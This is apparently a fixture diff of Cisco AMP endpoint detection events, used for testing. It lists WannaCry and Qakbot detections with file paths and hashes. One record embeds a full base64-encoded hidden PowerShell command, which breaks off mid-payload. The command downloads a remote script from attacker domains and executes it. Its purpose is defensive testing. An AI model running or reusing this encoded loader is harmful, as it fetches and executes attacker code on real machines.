+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAM